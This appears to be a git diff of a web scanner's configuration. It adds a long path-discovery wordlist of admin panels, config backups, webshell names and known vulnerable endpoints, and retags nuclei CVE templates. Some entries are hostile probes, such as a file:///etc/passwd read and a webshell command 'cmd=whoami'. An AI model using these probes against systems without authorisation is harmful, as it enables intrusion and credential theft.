soapdocs/ soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml soapserver/ soeasy.jsp +soft-admin +soft_admin +software +sohoadmin +solr/ +solr/admin/ +solr/admin/file/?file=solrconfig.xml +solutions sonar/ sonarcube/ sonarqube/ @@ -6141,6 +10417,11 @@ source/ source/inspector.html source_gen source_gen.caches +sp +space +spacer +spadmin +spam spamlog.log spec/ spec/examples.txt @@ -6148,12 +10429,20 @@ spec/lib/database.yml spec/lib/settings.local.yml spec/reports/ spec/tmp +special +sphinx spjspshell.jsp splunk/ +sponsors +spool +sports +spring spwd.db spy.aspx spyjsp2010.jsp +sql sql-admin/ +sql.%EXT% sql.inc sql.php sql.sql @@ -6188,23 +10477,37 @@ sqlbuddy sqlbuddy/ sqlbuddy/login.php sqldump.sql +sqli/ +sqlmanager sqlmanager/ sqlmigrate.php +sqlnet sqlnet.log +sqlweb sqlweb/ squid-reports/ squid/ squid3_log/ +squirrelmail +src src/ src/app.js src/index.js src/server.js +srchadm srv/ srv_gen/ ss_vms_admin_sm/ +ssadmin +ssc/api/v1/bulk ssh/ sshadmin/ ssl/ +ssl_admin +sslmgr +ssodad +sspadmin +sswadmin st.php st1.jsp st3.jsp @@ -6212,7 +10515,11 @@ st5.jsp st6.jsp stackstorm/ stacktrace.log +stadmin +staff +staff.%EXT% staff/ +staffadmin stage_create_service.sh stage_create_service_dev.sh stage_create_service_prod.sh @@ -6220,8 +10527,12 @@ stage_deploy.sh stage_deploy_dev.sh stage_deploy_prod.sh stager.jsp_ +staging +staging.%EXT% stamp-h1 staradmin/ +start +start.%EXT% start.html start.sh startServer.log @@ -6230,33 +10541,88 @@ startup.sh stas/ stash/ stat/ +static +static.%EXT% static.. +static/api/swagger.json +static/api/swagger.yaml static/dump.sql statistics statistics.jsp statistics/ stats +stats.%EXT% +stats.json stats/ statsd/ +status status.php status.xsl status/ +status/selfDiscovered/status status?full=true statusicon/ +statuspoll +statystyka/ +storage storage/ storage/logs/laravel.log +store +store-admin +store.%EXT% store.tgz +store/app/etc/local.xml +store_admin +storeadmin +stories +story +stow.%EXT% +strona_1 +strona_10 +strona_11 +strona_12 +strona_13 +strona_14 +strona_15 +strona_16 +strona_17 +strona_18 +strona_19 +strona_2 +strona_20 +strona_21 +strona_3 +strona_4 +strona_5 +strona_6 +strona_7 +strona_8 +strona_9 stronghold-info stronghold-status stssys.htm stt.jsp +style style.jsp +styles +styles/prosilver/style.cfg stylesheet.jsp stylesheets/bundles +stzx_admin/index.html sub-login/ +subadmin +submit +submit_article.%EXT% +subscribe +subscribe.html +subscription.%EXT% subversion/ +sugarcrm sugarcrm.log +sugarcrm/index.php?module=Accounts&action=ShowDuplicates +sugarcrm/index.php?module=Contacts&action=ShowDuplicates suiyue.jsp +sunvalleyadmin supe.php super super.php @@ -6266,6 +10632,7 @@ super_inde.php super_index super_logi.php super_login +superadmin superma.php superman superman/ @@ -6280,12 +10647,18 @@ supervise/Logi.php supervise/Login supervisor/ supervisord/ +support +support.%EXT% support/ +support_admin support_login/ surgemail/ surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf +survey +surveyadmin suspended.page +svn svn.revision svn/ svn/wc.db @@ -6295,12 +10668,22 @@ swagger-ui swagger-ui.html swagger.json swagger.yaml +swagger/api-docs swagger/index.html +swagger/swagger swagger/swagger-ui.htm swagger/swagger-ui.html swagger/ui +swagger/v1/api-docs swagger/v1/swagger.json +swagger/v1/swagger.json/ +swagger/v1/swagger.yaml +swagger/v2/api-docs +swagger/v2/swagger.json +swagger/v2/swagger.yaml swaggerui +swf +swf.%EXT% swfobject.js swfupload swfupload.swf @@ -6321,10 +10704,13 @@ symphony/config/databases.yml syncNode.log sypex.php sypexdumper.php +sys-admin sys-admin/ sys.jsp sys/pprof sys3.jsp +sys_admin +sys_log/ sysadm sysadm.php sysadm/ @@ -6336,7 +10722,10 @@ sysadmins/ sysbackup sysinfo.txt syslog/ +sysstat/ +system system-administration/ +system.%EXT% system.jsp system.log system/ @@ -6350,11 +10739,18 @@ system/logs/ system/storage/ system1.jsp.上传.jsp system_administration/ +systemadmin +systemstatus.xml +t t.jsp t00.php t00ls.jsp t00ls1.jsp +tadmin +tag +taglib-uri tags +tags.%EXT% tar tar.bz2 tar.gz @@ -6362,20 +10758,32 @@ tar.php target target/ tasks/ +tbadmin tconn.conf te123.jsp te8.jsp te8.jsp?cmd=whoami +te_admin team/ +tech technico.txt +technology +teknoportal/readme.txt +teleadmin telephone +telescope telphin.log +teluguadmin +temp temp-testng-customsuite.xml temp.jsp temp.php temp.sql temp/ +template +template.xml template/ +templates templates/ templates/beez/index.php templates/beez3/ @@ -6384,16 +10792,23 @@ templates/ja-helio-farsi/index.php templates/protostar/ templates/rhuk_milkyway/index.php templates/system/ +templates_admin +templates_c templates_c/ +templets +templets.%EXT% teraform/ +terms test test-build/ test-driver test-output/ test-report/ test-result +test.%EXT% test.asp test.aspx +test.cgi test.chm test.htm test.html @@ -6414,6 +10829,7 @@ test/ssi/test.shtml test/tmp/ test/version_tmp/ test/zero.jsp +test0 test0.php test1 test1.jsp @@ -6427,6 +10843,7 @@ test12345.jsp test123jks.jsp test1j.jsp test2 +test2.html test2.jsp test2.php test222.jsp @@ -6449,26 +10866,49 @@ test_.jsp?pass=1 test_gen test_gen.caches test_ip.php +testadmin testfile.php +testimonials +testing testjsp.jsp testkrm.jsp testproxy.php tests tests/ tests/phpunit_report.xml +testweb texinfo.tex +text +text-base/etc/passwd textpattern/ +thank-you.%EXT% +thanks.%EXT% +thankyou.%EXT% +theme themes themes/ themes/default/htdocs/flash/ZeroClipboard.swf +thirdparty/fckeditor +thread threaddump +threadrate.%EXT% +threads +thumb +thumb.%EXT% +thumbnail thumbs.db thumbs/ thx.jsp tianzi.jsp +tiki +tiki-admin +tiki-admin.%EXT% +tiki/doc/stable.version tikiwiki time.jsp +time.php timeline.xctimeline +tiny_mce tiny_mce/ tiny_mce/plugins/filemanager/examples.html tiny_mce/plugins/imagemanager/pages/im/index.html @@ -6480,6 +10920,9 @@ tinyfilemanager.php tinyfilemanager/ tinymce tinymce/ +tinymce/jscripts/tiny_mce +tips +title tmp tmp.php tmp/ @@ -6521,6 +10964,10 @@ tmp/vaga.php tmp/whmcs.php tmp/xd.php tmpbutian.jsp +tmui/login.jsp +tmui/tmui/login/welcome.jsp +tn +todo.txt token.json tomcat-docs/appdev/sample/web/hello.jsp tomcat/axis/ @@ -6529,10 +10976,25 @@ tools tools.php tools/ tools/_backups/ +tools/adminer.php tools/phpMyAdmin/index.php +toolsadminer.php +top +topic +topicadmin +topicadmin.%EXT% +topics +touradmin trace trace.json +trackback +tradetheme +training +trans +transfer +translate.sql transmission/web/ +travel tree.jsp tresearch/ tresearch/happyaxis.jsp @@ -6542,11 +11004,21 @@ tsconfig.json tset.jsp tst tst.jsp +tsweb +tsweb/ +ttadmin +ttt_admin +tttadmin +tubeace-admin tunnel.jsp tunnel.tomcat.5.jsp tunneltm5.jsp +tutorials +tv +tvadmin twitter/.env txt/ +types typings/ typo3 typo3/ @@ -6555,20 +11027,38 @@ typo3/phpmyadmin/index.php typo3/phpmyadmin/scripts/setup.php typo3_src typo3conf/AdditionalConfiguration.php +typo3conf/ext/crawler/ext_tables.sql +typo3conf/ext/pw_highslide_gallery/ext_tables.sql +typo3conf/ext/static_info_tables/ext_tables.sql +typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql +typo3conf/ext/static_info_tables/ext_tables_static+adt.sql +typo3conf/ext/twwc_pages/ext_tables.sql +typo3conf/ext/yag_themepack_jquery/ext_tables.sql typo3conf/temp_fieldInfo.php typo3temp/ u.jsp +uadmin uber/ uber/phpMemcachedAdmin/ uber/phpMyAdmin/ uber/phpMyAdminBackup/ +ucp.%EXT% ucwa/ uddi +uddi/uddilistener uddiexplorer +uddigui/ +uddilistener +uddisoap/ +ueditor/php/getRemoteImage.php ui ui/ +ujadmin +uk +umbraco/webservices/codeEditorSave.asmx unattend.txt unifiedmessaging/ +uno unsafe.jsp up.jsp up.php @@ -6576,12 +11066,16 @@ up1.jsp up2.jsp up_win32.jsp update +update.%EXT% update.php updates +updates.%EXT% upfile.php +upgrade upgrade.jsp upgrade.php upgrade.readme +upgrade.txt upguard/ upl.php upload @@ -6603,34 +11097,56 @@ upload/test.php upload/test.txt upload/upload.php upload2.php +upload_admin upload_backup/ upload_file.php uploaded/ +uploader uploader.php uploader/ uploadfile.asp uploadfile.php uploadfiles.php +uploadify uploadify.php uploadify/ +uploads uploads.php uploads/ +uploads/affwp-debug.log uploads/dump.sql +uploads_admin upstream_conf ur-admin ur-admin.php ur-admin/ +uri +url url.jsp +us +usage usage/ +usagedata usebean.jsp user +user-data.txt +user-data.txt.i +user.%EXT% user.asp user.html user.php user.txt user/ +user/0 +user/1 +user/2 +user/3 user/admin user/admin.php +user/login.%EXT% +user/login/ +user/signup +user_admin user_guide user_guide_src/build/ user_guide_src/cilexer/build/ @@ -6639,12 +11155,18 @@ user_guide_src/cilexer/pycilexer.egg-info/ user_uploads useradmin useradmin/ +usercp +usercp.%EXT% userdb userfiles +userinfo.%EXT% userlogin userlogin.php usernames.txt +usernote.%EXT% +userportal/webpages/myaccount/login.jsp users +users.%EXT% users.csv users.db users.ini @@ -6652,6 +11174,7 @@ users.json users.log users.mdb users.php +users.pwd users.sql users.sql.gz users.sqlite @@ -6660,18 +11183,27 @@ users.xls users/ users/admin users/admin.php +users/login +users/login.%EXT% +usr +usr-bin/ usr/ usuario/ usuarios/ usuarios/login.php +utf8 utility_login/ +utils utils.jsp uvpanel/ uwsgi.ini +v v1 v1.0 +v1.0/ v1.1 v1/ +v1/api-docs v1/public/yql v1/test/js/console.html v1/test/js/console_ajax.js @@ -6679,16 +11211,34 @@ v2 v2.0 v2/ v2/_catalog +v2/api-docs v2/keys/?recursive=true v3 +v3/ +v4/ +vadmin +vadmin.%EXT% vadmind/ vagrant-spec.config.rb vagrant/ validator.php +var +var.%EXT% var/ var/backups/ var/bootstrap.php.cache var/cache/ +var/lib/cloud/instance/boot-finished +var/lib/cloud/instance/cloud-config.txt +var/lib/cloud/instance/datasource +var/lib/cloud/instance/handlers/ +var/lib/cloud/instance/obj.pkl +var/lib/cloud/instance/scripts/ +var/lib/cloud/instance/sem/ +var/lib/cloud/instance/user-data.txt +var/lib/cloud/instance/user-data.txt.i +var/lib/cloud/instance/vendor-data.txt +var/lib/cloud/instance/vendor-data.txt.i var/log var/log/ var/log/authorizenet.log @@ -6701,32 +11251,59 @@ var/log/payment_paypal_express.log var/logs/ var/package/ var/sessions/ +variables.%EXT% variant/ vault/ +vb +vb.%EXT% vb.rar vb.sql vb.zip +vendor-data.txt +vendor-data.txt.i vendor/ vendor/assets/bower_components +vendor/autoload.php vendor/bundle +vendor/composer/ClassLoader.php +vendor/composer/LICENSE +vendor/composer/autoload_classmap.php +vendor/composer/autoload_files.php +vendor/composer/autoload_namespaces.php +vendor/composer/autoload_psr4.php +vendor/composer/autoload_real.php +vendor/composer/autoload_static.php vendor/composer/installed.json +vendor/phpunit/Util/PHP/eval-stdin.php +vendor/phpunit/phpunit/Util/PHP/eval-stdin.php +vendor/phpunit/phpunit/phpunit vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +vendor/phpunit/src/Util/PHP/eval-stdin.php vendors/ venv.bak/ venv/ ver007.jsp ver008.jsp +verify.php?id=1&confirm_hash= version version.txt +version.web version/ very_simple.jsp +video video-js.swf +video.%EXT% view-source view.php view_source.jsp +viewforum.%EXT% +viewonline.%EXT% views +views/ajax/autocomplete/user/a +viewtopic.%EXT% vignettes/ violations/ +virtualems/Login.aspx vm vmailadmin/ vorod @@ -6736,10 +11313,13 @@ vorud vorud.php vorud/ vpn/ +vpn/index.html vqmod/checked.cache vqmod/logs/ vqmod/mods.cache vqmod/vqcache/ +vti_inf.html +vtiger vtiger/ vtigercrm/ vtund.conf @@ -6758,6 +11338,7 @@ warcd.jsp warn.jsp warsyss.jsp warsyw.jsp +wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd wblgc.jsp wc.php wconfig.jsp @@ -6791,36 +11372,52 @@ web.tgz web.xml web.zip web/ +web/adminer.php web/bundles/ web/phpMyAdmin/ web/phpMyAdmin/index.php web/phpMyAdmin/scripts/setup.php +web/phpmyadmin/ web/scripts/setup.php +web/static/c web/uploads/ web02.jsp web2.jsp webadmin +webadmin.%EXT% webadmin.html webadmin.php webadmin/ +webadmin/admin.%EXT% webadmin/admin.html webadmin/admin.php +webadmin/index.%EXT% webadmin/index.html webadmin/index.php +webadmin/login.%EXT% webadmin/login.html webadmin/login.php +webadmin/out +webadmin/start/ +webadminer.php webalizer +webalizer.%EXT% +webalizer/ webapp/examples/simple.jsp webapp/wm/runtime.jsp +webclient/Login.xhtml +webconsole/webpages/login.jsp webdav.password webdav/ webdav/index.html webdav/servlet/webdav/ +webdb webdb/ webgrind weblogic_test1.jsp weblogic_test2.jsp weblogs +webmail webmail/ webmail/src/configtest.php webmaster @@ -6829,6 +11426,8 @@ webmaster/ webmin/ webpack.config.js webpack.mix.js +webpage +webpage.%EXT% webshell-nc.jsp webshell.jsp webshell.jspx @@ -6836,19 +11435,23 @@ webshell1.jsp webshell2.jsp webshell3.jsp webshell4.jsp +website website.git website.tar website.tar.bz2 website.tar.gz website.zip +websql websql/ webstat +webstat-ssl/ webstat/ webstats webstats.html webstats/ webticket/ webticket/webticketservice.svc +webticket/webticketservice.svcabs/ weixiao.php welcomeuser.jsp wenzhang @@ -6857,8 +11460,12 @@ wheels/ whmcs.php whmcs/ whmcs/downloads/dz.php +wiki wiki/ +wishlist +wishlist.%EXT% wizmysqladmin/ +wls-wsat/CoordinatorPortType wlscmd.jsp wordpress.tar wordpress.tar.bz2 @@ -6868,51 +11475,132 @@ wordpress/ wordpress/wp-login.php workspace.xml workspace/uploads/ +wp +wp-admin wp-admin/ +wp-admin/admin-ajax.php wp-admin/c99.php wp-admin/install.php wp-admin/setup-config.php wp-app.log wp-cli.yml +wp-config.bak +wp-config.good wp-config.inc wp-config.old wp-config.php +wp-config.php-bak +wp-config.php.0 +wp-config.php.1 +wp-config.php.2 +wp-config.php.3 +wp-config.php.4 +wp-config.php.5 +wp-config.php.6 +wp-config.php.7 +wp-config.php.8 +wp-config.php.9 +wp-config.php.backup wp-config.php.bak +wp-config.php.bak1 +wp-config.php.bk +wp-config.php.cust +wp-config.php.disabled wp-config.php.dist wp-config.php.inc +wp-config.php.new wp-config.php.old +wp-config.php.orig +wp-config.php.original wp-config.php.save +wp-config.php.swn +wp-config.php.swo wp-config.php.swp wp-config.php.txt wp-config.php.zip +wp-config.php_ +wp-config.php_1 +wp-config.php_Old +wp-config.php_bak +wp-config.php_new wp-config.php~ +wp-content wp-content/ +wp-content/ai1wm-backups +wp-content/ai1wm-backups/ wp-content/backup-db/ +wp-content/backups-dup-pro/ wp-content/backups/ +wp-content/backupwordpress/ wp-content/blogs.dir/ wp-content/cache/ +wp-content/content/cache +wp-content/contents/cache/ wp-content/debug.log +wp-content/envato-backups/ +wp-content/infinitewp/backups/ +wp-content/managewp/backups/ wp-content/mu-plugins/ +wp-content/old-cache/ wp-content/plugins/adminer/inc/editor/index.php +wp-content/plugins/akismet/admin.php +wp-content/plugins/akismet/akismet.php +wp-content/plugins/all-in-one-wp-migration/storage +wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs= +wp-content/plugins/boldgrid-backup/= wp-content/plugins/count-per-day/js/yc/d00.php +wp-content/plugins/disqus-comment-system/disqus.php +wp-content/plugins/google-sitemap-generator/sitemap-core.php wp-content/plugins/hello.php +wp-content/plugins/jrss-widget/proxy.php?url= +wp-content/plugins/super-forms/ +wp-content/plugins/wp-publication-archive/includes/openfile.php?file= +wp-content/plugins/wpengine-snapshot/snapshots/ +wp-content/updraft/ wp-content/upgrade/ wp-content/uploads/ +wp-content/uploads/aiowps_backups/ +wp-content/uploads/backupbuddy_backups/ +wp-content/uploads/backupbuddy_temp wp-content/uploads/dump.sql wp-content/uploads/file-manager/log.txt +wp-content/uploads/ithemes-security/backups/ +wp-content/uploads/mainwp/backup +wp-content/uploads/pb_backupbuddy +wp-content/uploads/snapshots/ +wp-content/uploads/sucuri/ +wp-content/uploads/wp-clone/ +wp-content/uploads/wp_all_backup/ +wp-content/uploads/wpbackitup_backups/ +wp-content/wfcache/ +wp-content/wishlist-backup/ +wp-cron.php +wp-includes wp-includes/ wp-includes/rss-functions.php wp-json/ wp-json/wp/v2/users/ +wp-login wp-login.php wp-login/ +wp-register wp-register.php +wp-rss2 +wp-signup.php +wp-snapshots/ wp.php wp.rar/ wp.zip wp/ wp/wp-login.php wpad.dat +wps/PA_WCM_Authoring_UI/proxy/http/example.com +wps/PA_WCM_Authoring_UI/proxy/https/example.com +wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com +wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com +wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com +wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com +wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com ws-client/loanCalculation.jsp ws.php ws1.jsp @@ -6938,6 +11626,7 @@ ww.jsp www-error.log www-test/ www.jsp +www.key www.rar www.sql www.tar @@ -6989,9 +11678,11 @@ xls/ xm.jsp xm11.jsp xm2019.jsp +xml xml/ xml/_common.xml xml/common.xml +xmlrpc xmlrpc.php xmlrpc_server.php xphpMyAdmin/ @@ -7017,6 +11708,7 @@ yarn-error.log yarn.lock yaycve.jsp yayshell.jsp +yii/vendor/phpunit/phpunit/phpunit yijuhua.jsp ylwrap yonetici @@ -7027,21 +11719,84 @@ yonetim.html yonetim.php youdao.jsp yum.log +zabbix.php?action=dashboard.view&dashboardid=1 zabbix/ zebra.conf zehir.php zend.jsp +zend/vendor/phpunit/phpunit/phpunit +zenphoto/zp zero.jsp zeroclipboard.swf zf_backend.php +zimbra zimbra/ zipkin/ zone-h.php +zp +zp/zp zval.jsp zx.jsp zx.jsp000.jsp ~/ +~adm +~admin ~admin/ +~administrator +~anonymous +~apache +~backup +~bin +~daemon +~data +~database +~db +~firewall +~ftp +~fw +~fwadmin +~fwuser +~games +~gdm +~gopher +~guest +~halt +~help +~helpdesk +~http +~ident +~lp +~mail +~mailnull +~news +~nobody +~nscd +~office +~operator +~pop +~postmaster +~reception +~root +~rpc +~rpcuser +~shutdown +~sql +~staff +~sync +~system +~test +~testuser +~toor +~user +~user1 +~user2 +~user3 +~user4 +~user5 +~uucp +~web +~www +~xfs 老V.jsp 老V.jsp~ 脱mysql数据库.jsp @@ -7067,4 +11822,4 @@ zx.jsp000.jsp 带回显执行cmd.jsp 灭天远程管理.jsp 灭天远程管理.jsp~ -内网渗透探测out.jsp".t.jsp!.gitignore +内网渗透探测out.jsp".t.jsp!.gitignore \ No newline at end of file diff --git a/config/nuclei-templates/cves/2000/CVE-2000-0114.yaml b/config/nuclei-templates/cves/2000/CVE-2000-0114.yaml index 0050d0c90..ecff9b7b8 100644 --- a/config/nuclei-templates/cves/2000/CVE-2000-0114.yaml +++ b/config/nuclei-templates/cves/2000/CVE-2000-0114.yaml @@ -11,7 +11,7 @@ info: classification: cve-id: CVE-2000-0114 remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft + tags: cve,cve2000,frontpage,microsoft,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2002/CVE-2002-1131.yaml b/config/nuclei-templates/cves/2002/CVE-2002-1131.yaml index 9f0971eed..3925b3ad7 100644 --- a/config/nuclei-templates/cves/2002/CVE-2002-1131.yaml +++ b/config/nuclei-templates/cves/2002/CVE-2002-1131.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2002-1131 classification: cve-id: CVE-2002-1131 - tags: xss,squirrelmail,cve,cve2002 + tags: cve2002,edb,xss,squirrelmail,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2004/CVE-2004-0519.yaml b/config/nuclei-templates/cves/2004/CVE-2004-0519.yaml index 163885809..ab269e8cb 100644 --- a/config/nuclei-templates/cves/2004/CVE-2004-0519.yaml +++ b/config/nuclei-templates/cves/2004/CVE-2004-0519.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to the latest version. classification: cve-id: CVE-2004-0519 - tags: xss,squirrelmail,cve2004,cve + tags: squirrelmail,cve2004,cve,edb,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2005/CVE-2005-2428.yaml b/config/nuclei-templates/cves/2005/CVE-2005-2428.yaml index 9f7d76a8e..ebfaa8b69 100644 --- a/config/nuclei-templates/cves/2005/CVE-2005-2428.yaml +++ b/config/nuclei-templates/cves/2005/CVE-2005-2428.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2005-2428 cwe-id: CWE-200 - tags: cve,cve2005,domino + tags: domino,edb,cve,cve2005 requests: - method: GET diff --git a/config/nuclei-templates/cves/2006/CVE-2006-2842.yaml b/config/nuclei-templates/cves/2006/CVE-2006-2842.yaml index 194491265..9834d5ffe 100644 --- a/config/nuclei-templates/cves/2006/CVE-2006-2842.yaml +++ b/config/nuclei-templates/cves/2006/CVE-2006-2842.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2006-2842 cwe-id: CWE-22 - tags: cve,cve2006,lfi,squirrelmail + tags: cve,cve2006,lfi,squirrelmail,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2007/CVE-2007-4504.yaml b/config/nuclei-templates/cves/2007/CVE-2007-4504.yaml index cedde5ee4..98144c6f0 100644 --- a/config/nuclei-templates/cves/2007/CVE-2007-4504.yaml +++ b/config/nuclei-templates/cves/2007/CVE-2007-4504.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2007-4504 cwe-id: CWE-22 - tags: cve,cve2007,joomla,lfi + tags: lfi,edb,cve,cve2007,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2007/CVE-2007-5728.yaml b/config/nuclei-templates/cves/2007/CVE-2007-5728.yaml index 28e2d5a8b..f9b21ef14 100644 --- a/config/nuclei-templates/cves/2007/CVE-2007-5728.yaml +++ b/config/nuclei-templates/cves/2007/CVE-2007-5728.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2007-5728 metadata: shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2007,xss,pgadmin,phppgadmin + tags: cve,cve2007,xss,pgadmin,phppgadmin,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-1059.yaml b/config/nuclei-templates/cves/2008/CVE-2008-1059.yaml index e2eac172e..87271cc67 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-1059.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-1059.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2008-1061 cwe-id: CWE-22 - tags: cve,cve2008,wordpress,wp-plugin,lfi,wp,sniplets + tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml b/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml index 0898c8ee5..69b8c1280 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-1061.yaml @@ -11,7 +11,7 @@ info: - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://secunia.com/advisories/29099 - tags: cve,cve2008,xss,wordpress,wp-plugin,wp,sniplets + tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-4668.yaml b/config/nuclei-templates/cves/2008/CVE-2008-4668.yaml index 95c5588d2..9a7dd5211 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-4668.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-4668.yaml @@ -13,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2008-4668 classification: cve-id: CVE-2008-4668 - tags: cve,cve2008,joomla,lfi + tags: cve,cve2008,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-4764.yaml b/config/nuclei-templates/cves/2008/CVE-2008-4764.yaml index 7ad6333c2..4b90a27a7 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-4764.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-4764.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2008-4764 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi + tags: edb,cve,cve2008,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-5587.yaml b/config/nuclei-templates/cves/2008/CVE-2008-5587.yaml index 0d8ab084e..3e5a2f363 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-5587.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-5587.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2008-5587 metadata: shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin + tags: cve,cve2008,lfi,phppgadmin,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-6080.yaml b/config/nuclei-templates/cves/2008/CVE-2008-6080.yaml index 24258c190..7a5240ac8 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-6080.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-6080.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2008-6080 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi + tags: edb,cve,cve2008,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-6172.yaml b/config/nuclei-templates/cves/2008/CVE-2008-6172.yaml index d070b69b6..362a408e8 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-6172.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-6172.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/ classification: cve-id: CVE-2008-6172 - tags: cve,cve2008,joomla,lfi + tags: cve2008,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-6222.yaml b/config/nuclei-templates/cves/2008/CVE-2008-6222.yaml index 7e62b87b4..dd11e3ad7 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-6222.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-6222.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.6 cve-id: CVE-2008-6222 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi + tags: cve2008,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2008/CVE-2008-6668.yaml b/config/nuclei-templates/cves/2008/CVE-2008-6668.yaml index b1e1632d2..781876d1e 100644 --- a/config/nuclei-templates/cves/2008/CVE-2008-6668.yaml +++ b/config/nuclei-templates/cves/2008/CVE-2008-6668.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2008-6668 cwe-id: CWE-22 - tags: cve,cve2008,nweb2fax,lfi,traversal + tags: cve2008,nweb2fax,lfi,traversal,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-0545.yaml b/config/nuclei-templates/cves/2009/CVE-2009-0545.yaml index 8201ec293..310360279 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-0545.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-0545.yaml @@ -12,7 +12,7 @@ info: - http://www.ikkisoft.com/stuff/LC-2009-01.txt classification: cve-id: CVE-2009-0545 - tags: cve,cve2009,zeroshell,kerbynet,rce + tags: edb,cve,cve2009,zeroshell,kerbynet,rce requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-0932.yaml b/config/nuclei-templates/cves/2009/CVE-2009-0932.yaml index ae3a6b70e..747fd013f 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-0932.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-0932.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.6 cve-id: CVE-2009-0932 cwe-id: CWE-22 - tags: cve,cve2009,horde,lfi,traversal + tags: cve,cve2009,horde,lfi,traversal,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2009/CVE-2009-1151.yaml b/config/nuclei-templates/cves/2009/CVE-2009-1151.yaml index 3e82b7ac2..366b3af91 100644 --- a/config/nuclei-templates/cves/2009/CVE-2009-1151.yaml +++ b/config/nuclei-templates/cves/2009/CVE-2009-1151.yaml @@ -13,10 +13,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cve-id: CVE-2009-1151 cwe-id: CWE-77 - tags: cve,cve2009,phpmyadmin,rce,deserialization,kev + tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce requests: - 